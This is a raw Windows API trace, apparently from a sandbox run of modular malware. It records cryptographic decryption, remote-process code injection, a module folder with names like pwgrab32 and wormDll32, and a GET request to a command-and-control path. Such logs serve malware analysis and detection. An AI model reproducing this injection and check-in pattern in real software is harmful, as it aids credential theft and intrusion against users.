	[0253.295] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6520, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6520, pdwDataLen=0x128c3c) returned 1
	[0253.295] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.295] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.295] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.295] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.295] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0253.295] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6548
	[0253.295] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6548, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6548, pdwDataLen=0x128c3c) returned 1
	[0253.295] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.295] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.295] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.296] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.296] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0253.296] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c6570
	[0253.296] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c6570, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6570, pdwDataLen=0x128c3c) returned 1
	[0253.296] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.296] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.296] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.296] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.296] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0253.296] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.296] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c6598, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c6598, pdwDataLen=0x128c3c) returned 1
	[0253.296] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.296] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.296] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.297] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.297] CryptHashData (hHash=0x22b6f40, pbData=0x276ecb0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0253.297] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.297] CryptGetHashParam (in: hHash=0x22b6f40, dwParam=0x2, pbData=0x27c65c0, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c65c0, pdwDataLen=0x128c3c) returned 1
	[0253.297] CryptDestroyHash (hHash=0x22b6f40) returned 1
	[0253.297] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.297] CryptAcquireContextW (in: phProv=0x128c40, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128c40*=0x225e30) returned 1
	[0253.297] CryptCreateHash (in: hProv=0x225e30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128c44 | out: phHash=0x128c44) returned 1
	[0253.297] CryptHashData (hHash=0x22b6b80, pbData=0x276ecb0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0253.297] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x4, pbData=0x128c3c, pdwDataLen=0x128c38, dwFlags=0x0 | out: pbData=0x128c3c, pdwDataLen=0x128c38) returned 1
	[0253.297] CryptGetHashParam (in: hHash=0x22b6b80, dwParam=0x2, pbData=0x27c65e8, pdwDataLen=0x128c3c, dwFlags=0x0 | out: pbData=0x27c65e8, pdwDataLen=0x128c3c) returned 1
	[0253.297] CryptDestroyHash (hHash=0x22b6b80) returned 1
	[0253.298] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.299] CryptImportKey (in: hProv=0x225e30, pbData=0x128c30, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x128c70 | out: phKey=0x128c70*=0x22b6b80) returned 1
	[0253.299] CryptSetKeyParam (hKey=0x22b6b80, dwParam=0x4, pbData=0x128c5c*=0x1, dwFlags=0x0) returned 1
	[0253.299] CryptSetKeyParam (hKey=0x22b6b80, dwParam=0x1, pbData=0x27c6700, dwFlags=0x0) returned 1
	[0253.300] CryptDecrypt (in: hKey=0x22b6b80, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28bde60, pdwDataLen=0x128c64 | out: pbData=0x28bde60, pdwDataLen=0x128c64) returned 1
	[0253.300] CryptDestroyKey (hKey=0x22b6b80) returned 1
	[0253.300] CryptReleaseContext (hProv=0x225e30, dwFlags=0x0) returned 1
	[0253.301] GetVersion () returned 0x1db10106
	[0253.302] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x128c70, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x128c70) returned 0x0
	[0253.302] BCryptImportKeyPair (in: hAlgorithm=0x22ee348, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x128c78, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x128c78) returned 0x0
	[0253.304] BCryptGetProperty (in: hObject=0x229a370, pszProperty="SignatureLength", pbOutput=0x128c90, cbOutput=0x4, pcbResult=0x128c68, dwFlags=0x0 | out: pbOutput=0x128c90, pcbResult=0x128c68) returned 0x0
	[0253.304] BCryptVerifySignature (hKey=0x229a370, pPaddingInfo=0x0, pbHash=0x22a6618, cbHash=0x30, pbSignature=0x28d2b70, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0253.307] BCryptDestroyKey (in: hKey=0x229a370 | out: hKey=0x229a370) returned 0x0
	[0253.307] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee348, dwFlags=0x0 | out: hAlgorithm=0x22ee348) returned 0x0
	[0253.307] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0253.308] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs")) returned 0x2010
	[0253.308] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x668
	[0253.308] WriteFile (in: hFile=0x668, lpBuffer=0x2873ea0*, nNumberOfBytesToWrite=0x14db0, lpNumberOfBytesWritten=0x128cd0, lpOverlapped=0x0 | out: lpBuffer=0x2873ea0*, lpNumberOfBytesWritten=0x128cd0*=0x14db0, lpOverlapped=0x0) returned 1
	[0253.310] CloseHandle (hObject=0x668) returned 1
	[0253.311] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x7e96f860, dwHighDateTime=0x1d50a6a)) 
	[0253.312] lstrlenA (lpString="sinj") returned 4
	[0253.312] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0253.312] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x20000, lpBuffer=0x27e15e8*, nSize=0x5, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x27e15e8*, lpNumberOfBytesWritten=0x1287c0*=0x5) returned 1
	[0253.312] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x14d08, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000
	[0253.312] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x28d2be8*, nSize=0x14d08, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x28d2be8*, lpNumberOfBytesWritten=0x1287c0*=0x14d08) returned 1
	[0253.315] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x200000
	[0253.315] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x200000, lpBuffer=0x12884c*, nSize=0x400, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x12884c*, lpNumberOfBytesWritten=0x1287c0*=0x400) returned 1
	[0253.315] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x230000
	[0253.316] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230000, lpBuffer=0x128c4c*, nSize=0x80, lpNumberOfBytesWritten=0x1287c0 | out: lpBuffer=0x128c4c*, lpNumberOfBytesWritten=0x1287c0*=0x80) returned 1
	[0253.316] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000
	[0253.317] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740, nSize=0x70, lpNumberOfBytesRead=0x128720 | out: lpBuffer=0x128740*, lpNumberOfBytesRead=0x128720*=0x70) returned 1
	[0253.317] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x5f0000
	[0253.317] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5f0000, lpBuffer=0x22a6618*, nSize=0x2c, lpNumberOfBytesWritten=0x128718 | out: lpBuffer=0x22a6618*, lpNumberOfBytesWritten=0x128718*=0x2c) returned 1
	[0253.318] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740*, nSize=0x70, lpNumberOfBytesWritten=0x128718 | out: lpBuffer=0x128740*, lpNumberOfBytesWritten=0x128718*=0x70) returned 1
	[0253.318] ResetEvent (hEvent=0x478) returned 1
	[0253.318] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0253.376] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x128740, nSize=0x70, lpNumberOfBytesRead=0x128718 | out: lpBuffer=0x128740*, lpNumberOfBytesRead=0x128718*=0x70) returned 1
	[0253.376] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0253.376] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0253.376] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230000, lpBuffer=0x128c4c, nSize=0x80, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x128c4c*, lpNumberOfBytesRead=0x1287d4*=0x80) returned 1
	[0253.376] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x200000, lpBuffer=0x12884c, nSize=0x400, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x12884c*, lpNumberOfBytesRead=0x1287d4*=0x400) returned 1
	[0253.376] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5e0004, lpBuffer=0x128800, nSize=0x4, lpNumberOfBytesRead=0x1287d4 | out: lpBuffer=0x128800*, lpNumberOfBytesRead=0x1287d4*=0x4) returned 1
	[0253.376] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0253.377] VirtualFreeEx (hProcess=0x47c, lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0253.377] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0253.377] VirtualFreeEx (hProcess=0x47c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0253.378] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x28d2be8) returned 1
	[0253.378] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2873ea0) returned 1
	[0253.378] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0253.378] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0253.378] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0253.378] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6b80
	[0253.378] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e14b0, Size=0x10) returned 0x27e1528
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1528, Size=0x10) returned 0x27e14b0
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e14b0, Size=0x10) returned 0x27e1528
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27e1528, Size=0x20) returned 0x27c6700
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c6700, Size=0x20) returned 0x27c5300
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0253.379] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c5300, Size=0x20) returned 0x27c6700
	[0253.379] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0253.380] GetLastError () returned 0x12
	[0253.380] FindClose (in: hFindFile=0x22b6b80 | out: hFindFile=0x22b6b80) returned 1
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0253.380] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0253.381] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0253.381] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0253.381] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0253.381] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/zIYr8Sl7Ok5Pm5Lfx/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0253.381] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0253.381] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0254.729] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0254.729] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0254.729] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0254.729] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22ffa20, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ffa20*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0254.730] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0254.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0254.730] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffa20, cbMultiByte=3, lpWideCharStr=0x22fffa8, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0254.730] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0254.730] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0254.730] lstrcpynW (in: lpString1=0x22ffa50, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0254.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0254.731] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffa8) returned 1
